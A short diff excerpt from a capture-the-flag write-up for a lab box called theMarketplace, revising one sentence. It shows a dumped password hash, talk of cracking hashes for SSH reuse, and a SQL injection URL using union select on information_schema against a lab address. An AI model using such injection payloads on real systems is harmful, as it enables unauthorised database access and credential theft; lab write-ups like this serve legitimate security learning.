Neyr/CTF-Writeups/theMarketplace/README.md

 4:test:$2b$10$zCeYI0Tqe/NO8RRbGmbnd.Hu.EpNknzhKzFX/NL5IfuZXKqsstbzC:0
 ```

-So we have so hashes that we can potentially crack and test for reuse on ssh but lets get the information in the messages table first so start by getting the columns
+So we have some hashes that we can potentially crack and test for reuse on ssh, but lets get the information in the messages table first, so start again by getting the columns
 ```
 http://10.10.160.210:32768/admin?user=0 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='messages'-- -